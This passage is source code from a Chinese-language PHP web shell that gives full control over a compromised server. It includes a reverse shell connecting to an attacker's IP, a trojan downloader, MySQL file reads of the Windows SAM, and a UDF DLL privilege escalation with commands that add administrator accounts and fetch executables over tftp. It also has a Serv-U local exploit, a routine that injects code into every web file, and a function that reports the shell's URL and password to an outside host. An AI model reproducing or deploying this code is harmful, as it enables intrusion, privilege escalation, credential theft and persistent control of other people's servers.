");
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i < count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
}
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('');
break;
case "perm":
html_n("");
break;
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "".$_SERVER['SERVER_ADMIN']."" : "".get_cfg_var("sendmail_from")."";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","
",$dis_func);$dis_func = str_replace(",","
",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("服务器时间",date("Y年m月d日 h:i:s",time())),
array("服务器域名","".$_SERVER['SERVER_NAME'].""),
array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
array("服务器操作系统",PHP_OS),
array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
array("你的IP",$_SERVER["REMOTE_ADDR"]),
array("Web服务端口",$_SERVER['SERVER_PORT']),
array("PHP运行方式",strtoupper(php_sapi_name())),
array("PHP版本",PHP_VERSION),
array("运行于安全模式",Info_Cfg("safemode")),
array("服务器管理员",$adminmail),
array("本文件路径",myaddress),
array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("允许使用curl_exec",Info_Fun("curl_exec")),
array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
array("显示错误信息 display_errors",Info_Cfg("display_errors")),
array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
array("允许最大上传文件 upload_max_filesize",$upsize),
array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
array("被禁用的函数 disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("图形处理 GD Library",Info_Fun("imageline")),
array("IMAP电子邮件系统",Info_Fun("imap_close")),
array("MySQL数据库",Info_Fun("mysql_close")),
array("SyBase数据库",Info_Fun("sybase_close")),
array("Oracle数据库",Info_Fun("ora_close")),
array("Oracle 8 数据库",Info_Fun("OCILogOff")),
array("PREL相容语法 PCRE",Info_Fun("preg_match")),
array("PDF文档支持",Info_Fun("pdf_close")),
array("Postgre SQL数据库",Info_Fun("pg_close")),
array("SNMP网络管理协议",Info_Fun("snmpget")),
array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
array("XML解析",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC数据库连接",Info_Fun("odbc_close")),
array("Session支持",Info_Fun("session_start")),
array("Socket支持",Info_Fun("fsockopen")),
);
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '';
for($i = 0;$i < count($info);$i++){echo '| '.$info[$i][0].' | '.$info[$i][1].' | '."\n";}
try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){}
echo '| Terminal Service端口为 | '.$registry_proxystring.' | '."\n";
echo '| Telnet端口为 | '.$Telnet.' | '."\n";
echo '| PcAnywhere端口为 | '.$PcAnywhere.' | '."\n";
echo ' ';
break;
case "nc":
$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
print<<
使用方法:
先在自己电脑运行"nc -l -p 1019"
然后在此填写你电脑的IP,点连接!
你的IP 端口号
END;
if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
{
echo '';
$mip=$_POST['mip'];
$bport=$_POST['bport'];
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
}else {
fputs ($fp ,"\n*********************************************\n
hacking url:http://www.7jyewu.cn/ is ok!
\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," [r00t@H4c3ing:/root]# ");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,"--> ".$message."\n");
}
fclose ($fp);
}
echo ' ';
}
break;
case "sqlshell":
$MSG_BOX = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = '连接MYSQL失败';
}
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
{
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
{
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'envl.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: attachment; filename='.$filedown);
header('Content-Length: '.strlen($downcode));
echo $downcode;
exit;
}
else $MSG_BOX = '下载文件失败';
}
$o = isset($_GET['o']) ? $_GET['o'] : '';
print<<
地址
端口
用户
密码
库名
END;
if($o == 'u')
{
$uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
if(!empty($_POST['uppath']))
{
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
{
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
{
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
}
else $MSG_BOX = '插入临时表失败';
@mysql_query('Drop TABLE IF EXISTS a;',$conn);
}
else $MSG_BOX = '创建临时表失败';
}
print<<
上传路径
选择文件
END;
}
elseif($o == 'd')
{
print<<
下载文件
END;
}
else
{
if(!empty($_POST['msql']))
{
$msql = $_POST['msql'];
if($result = @mysql_query($msql,$conn))
{
$MSG_BOX = '执行SQL语句成功
';
$k = 0;
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
}
else $MSG_BOX .= mysql_error();
}
print<<
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
Str[2] = "select '' into outfile 'F:/web/bak.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
return true;
}
END;
}
if($MSG_BOX != '') echo ' '.$MSG_BOX.' ';
else echo '';
break;
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print<<
超连接
下载到
END;
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
{
echo '';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '无法读取要下载的数据';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
echo ' ';
}
break;
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
}
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
else{$_SESSION['sql_port'] = '3306';}
if($_SESSION['sql_user'] && $_SESSION['sql_password']){
if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){
unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']);
die(html_a('?eanver=sqlshell','连接失败请返回'));
}
}
else{
die(html_a('?eanver=sqlshell','连接失败请返回'));
}
$query = mysql_query("SHOW DATABASES",$sqlcon);
html_n('| 数据库列表:');
while($db = mysql_fetch_array($query)) {
html_a('?eanver=issql&db='.$db['Database'],$db['Database']);
echo ' ';
}
html_n(' | ');
if($_GET['db']){
css_js("3");
mysql_select_db($_GET['db'], $sqlcon);
html_n('
');
if(!empty($_POST['sql'])){
if (@mysql_query($_POST['sql'],$sqlcon)) {
echo "执行SQL语句成功";
}else{
echo "出错: ".mysql_error();
}
}
if($_GET['table']){
html_n('');
$query = "SHOW COLUMNS FROM ".$_GET['table'];
$result = mysql_query($query,$sqlcon);
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields,$row['Field']);
html_n('| '.$row['Field'].' | ');
}
html_n(' ');
$result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error());
while($text = @mysql_fetch_assoc($result)){
foreach($fields as $row){
if($text[$row] == "") $text[$row] = 'NULL';
html_n('| '.$text[$row].' | ');
}
echo ' ';
}
}
else{
$query = "SHOW TABLES FROM " . $_GET['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat)){
html_n("| ".$row[0]." | ");
}
}
}
break;
case "upfiles":
html_n('| 服务器限制上传单个文件大小: '.@get_cfg_var('upload_max_filesize').'');
break;
case "guama":
$patht = isset($_POST['path']) ? $_POST['path'] : root_dir;
$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";
$codet = isset($_POST['code']) ? $_POST['code'] : "";
html_n(' | | 文件类型请用"|"隔开,也可以是指定文件名. | ');
if(!empty($_POST['path'])){
html_n('目标文件:
');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($patht,$codet,$_POST['return'],$bool,$typet);
}
break;
case "tihuan":
html_n(' | 此功能可批量替换文件内容,请小心使用.
| ');
if(!empty($_POST['path'])){
html_n('目标文件:
');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']);
}
break;
case "scanfile":
css_js("4");
html_n(' | 此功能可很方便的搜索到保存MYSQL用户密码的配置文件,用于提权.
当服务器文件太多时,会影响执行速度,不建议使用目录遍历. | ');
if(!empty($_POST['path'])){
html_n('找到文件:
');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
}
break;
case "scanphp":
html_n(' | | 原理是根据特征码定义的,请查看代码判断后再进行删除. | ');
if(!empty($_POST['path'])){
html_n('找到文件:
');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
}
break;
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631';
print<<
扫描IP
端口号
END;
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
{
echo '';
$ports = explode('|', $_POST['port']);
for($i = 0;$i < count($ports);$i++)
{
$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '开放端口 ---> '.$ports[$i].'
' : '关闭端口 ---> '.$ports[$i].'
';
ob_flush();
flush();
}
echo ' ';
}
break;
case "getcode":
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "
获取 URL 内容失败 ";exit;}
print<<
|
END;
break;
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<[执行命令] [添加用户]
';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
{
echo '';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
if(!empty($_POST['SUCommand']))
{
$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo "发送数据包: site exec ".$_POST["SUCommand"]."
";
$recvbuf = @fgets($exp, 1024);
echo "返回数据包: $recvbuf
";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo "发送数据包: $sendbuf
";
$recvbuf = @fgets($sock, 1024);
echo "返回数据包: $recvbuf
";
@fclose($exp);
}
@fclose($sock);
echo ' ';
}
break;
case "eval":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
html_n('| ');
break;
case "myexp":
$MSG_BOX = '请先导出DLL,再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.';
$info = '命令回显';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
if($conn)
{
@mysql_select_db($mdata);
if((!empty($_POST['outdll'])) && (!empty($_POST['mpath'])))
{
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if(@mysql_query($query,$conn))
{
$shellcode = Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
if(@mysql_query($query,$conn))
{
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
if(@mysql_query($query,$conn))
{
$ap = explode('/', $mpath); $inpath = array_pop($ap);
$query = 'Create Function state returns string soname \''.$inpath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '安装DLL成功' : '安装DLL失败';
}
else $MSG_BOX = '导出DLL文件失败';
}
else $MSG_BOX = '写入临时表失败';
@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
}
else $MSG_BOX = '创建临时表失败';
}
if(!empty($_POST['runcmd']))
{
$query = 'select state("'.$sqlcmd.'");';
$result = @mysql_query($query,$conn);
if($result)
{
$k = 0; $info = NULL;
while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
$info = $infotmp;
$MSG_BOX = '执行成功';
}
else $MSG_BOX = '执行失败';
}
}
else $MSG_BOX = '连接MYSQL失败';
}
print<<
function Fullm(i){
Str = new Array(11);
Str[0] = "ver";
Str[1] = "net user envl envl /add";
Str[2] = "net localgroup administrators envl /add";
Str[3] = "net start Terminal Services";
Str[4] = "tasklist /svc";
Str[5] = "netstat -ano";
Str[6] = "ipconfig";
Str[7] = "net user guest /active:yes";
Str[8] = "copy c:\\\\1.php d:\\\\2.php";
Str[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\server.exe";
Str[10] = "net start telnet";
Str[11] = "shutdown -r -t 0";
mform.sqlcmd.value = Str[i];
return true;
}
END;
break;
case "mysql_exec":
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
{
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
{
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
setcookie('m_eanverport',$_POST['mport'],$cookietime);
setcookie('m_eanveruser',$_POST['muser'],$cookietime);
setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
die('正在登陆,请稍候...');
}
}
print<<
地址
端口
用户
密码
END;
break;
case "mysql_msg":
$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
if($conn)
{
print<<
function Delok(msg,gourl)
{
smsg = "确定要删除[" + unescape(msg) + "]吗?";
if(confirm(smsg)){window.location = gourl;}
}
function Createok(ac)
{
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
return false;
}
END;
$BOOL = false;
$MSG_BOX = '用户:'.$_COOKIE['m_eanveruser'].' 地址:'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' 版本:';
$k = 0;
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo ' 数据库:';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo ' [ '.$db['Database'].']';}
echo ' '.$MSG_BOX.' ';
if(isset($_GET['edit']))
{
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '';
}
else
{
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$pagesize=20;
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
$numrows=$row_num;
$pages=intval($numrows/$pagesize);
if ($numrows%$pagesize) $pages++;
$offset=$pagesize*($page - 1);
$page=$_GET['p'];
if(!$page) $page=1;
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '';
echo '| 操作 | ';
while($row = @mysql_fetch_assoc($result))
{
array_push($fields,$row['Field']);
echo ''.$row['Field'].' | ';
}
echo ' ';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
$v = $p;
while($text = @mysql_fetch_assoc($result))
{
echo '| 修改 ';
echo ' 删除 | ';
foreach($fields as $row){echo ''.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).' | ';}
echo ' '."\r\n";$v++;
}
echo '
';
$pagep=$page-1;
$pagen=$page+1;
echo "共有 ".$row_num." 条记录 ";
if($pagep>0) $pagenav.=" 首页 上一页 "; else $pagenav.=" 上一页 ";
if($pagen<=$pages) $pagenav.=" 下一页 尾页"; else $pagenav.=" 下一页 ";
$pagenav.=" 第 [".$page."/".$pages."] 页 跳到 页";
echo $pagenav;
echo ' ';
echo '| 表名 | ';
echo ' 操作 | ';
echo ' 字符集 | ';
echo ' 大小 | ';
$result = @mysql_query($query,$conn);
$k = 0;
while($table = mysql_fetch_row($result))
{
$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
echo '| '.$table[0].' | ';
echo ' 插入 删除 | ';
echo ''.$statucoll[$k].' | '.File_Size($statusize[$k]).' | '."\r\n";
$k++;
}
echo '
';
}
}
}
else die('连接MYSQL失败,请重新登陆.');
if(!$BOOL and addslashes($query)!='') echo '';
break;
default: html_main($path,$shellname); break;
}
css_foot();
/*---doing---*/
function do_write($file,$t,$text)
{
$key = true;
$handle = @fopen($file,$t);
if(!@fwrite($handle,$text))
{
@chmod($file,0666);
$key = @fwrite($handle,$text) ? true : false;
}
@fclose($handle);
return $key;
}
function do_show($filepath){
$show = array();
$dir = dir($filepath);
while($file = $dir->read()){
if($file == '.' or $file == '..') continue;
$files = str_path($filepath.'/'.$file);
$show[] = $files;
}
$dir->close();
return $show;
}
function do_deltree($deldir){
$showfile = do_show($deldir);
foreach($showfile as $del){
if(is_dir($del)){
if(!do_deltree($del)) return false;
}elseif(!is_dir($del)){
@chmod($del,0777);
if(!@unlink($del)) return false;
}
}
@chmod($deldir,0777);
if(!@rmdir($deldir)) return false;
return true;
}
function do_showsql($query,$conn){
$result = @mysql_query($query,$conn);
html_n('
');
}
function hmlogin($xiao=1){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
$copyurl = base64_decode('aHR0cDovLzEyNy4wLjAuMS8v'); //aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249
$url=$copyurl.$serveru.'&p='.$serverp;
$url=urldecode($url);
$re=file_get_contents($url);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = envlpass;
if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "";}else{geturl();}}
}
function do_down($fd){
if(!@file_exists($fd)) msg('下载文件不存在');
$fileinfo = pathinfo($fd);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($fd));
@readfile($fd);
exit;
}
function do_download($filecode,$file){
header("Content-type: application/unknown");
header('Accept-Ranges: bytes');
header("Content-length: ".strlen($filecode));
header("Content-disposition: attachment; filename=".$file.";");
echo $filecode;
exit;
}
function TestUtf8($text)
{if(strlen($text) < 3) return false;
$lastch = 0;
$begin = 0;
$BOM = true;
$BOMchs = array(0xEF, 0xBB, 0xBF);
$good = 0;
$bad = 0;
$notAscii = 0;
for($i=0; $i < strlen($text); $i++)
{$ch = ord($text[$i]);
if($begin < 3)
{ $BOM = ($BOMchs[$begin]==$ch);
$begin += 1;
continue; }
if($begin==4 && $BOM) break;
if($ch >= 0x80 ) $notAscii++;
if( ($ch&0xC0) == 0x80 )
{if( ($lastch&0xC0) == 0xC0 )
{$good += 1;}
else if( ($lastch&0x80) == 0 )
{$bad += 1; }}
else if( ($lastch&0xC0) == 0xC0 )
{$bad += 1;}
$lastch = $ch;}
if($begin == 4 && $BOM)
{return 2;}
else if($notAscii==0)
{return 1;}
else if ($good >= $bad )
{return 2;}
else
{return 0;}}
function File_Str($string)
{
return str_replace('//','/',str_replace('\\','/',$string));
}
function File_Write($filename,$filecode,$filemode)
{
$key = true;
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
{
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true : false;
}
@fclose($handle);
return $key;
}
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function File_Size($size)
{
$kb = 1024; // Kilobyte
$mb = 1024 * $kb; // Megabyte
$gb = 1024 * $mb; // Gigabyte
$tb = 1024 * $gb; // Terabyte
if($size < $kb)
{
return $size." B";
}
else if($size < $mb)
{
return round($size/$kb,2)." K";
}
else if($size < $gb)
{
return round($size/$mb,2)." M";
}
else if($size < $tb)
{
return round($size/$gb,2)." G";
}
else
{
return round($size/$tb,2)." T";
}
}
function File_Read($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function do_phpfun($cmd,$fun) {
$res = '';
switch($fun){
case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
case "shell_exec": $res = @shell_exec($cmd); break;
case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
}
return $res;
}
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
$show = do_show($dir);
foreach($show as $files){
if(is_dir($files) && $bool){
do_passreturn($files,$code,$type,$bool,$filetype,$shell);
}else{
if($files == $shell) continue;
switch($type){
case "guama":
if(debug($files,$filetype)){
do_write($files,"ab","\n".$code) ? html_n("成功--> $files
") : html_n("失败--> $files
");
}
break;
case "qingma":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,'',$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
");
}
break;
case "tihuan":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
$newcode = str_replace($code,$filetype,$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--> $files
") : html_n("失败--> $files
");
}
break;
case "scanfile":
$file = explode('/',$files);
if(stristr($file[count($file)-1],$code)){
html_a("?eanver=editr&p=$files",$files);
echo '
';
}
break;
case "scancode":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
html_a("?eanver=editr&p=$files",$files);
echo '
';
}
break;
case "scanphp":
$fileinfo = pathinfo($files);
if($fileinfo['extension'] == $code){
$filecode = @file_get_contents($files);
if(muma($filecode,$code)){
html_a("?eanver=editr&p=".urlencode($files),"编辑");
html_a("?eanver=del&p=".urlencode($files),"删除");
echo $files.'
';
}
}
break;
}
}
}
}
class PHPzip{
var $file_count = 0 ;
var $datastr_len = 0;
var $dirstr_len = 0;
var $filedata = '';
var $gzfilename;
var $fp;
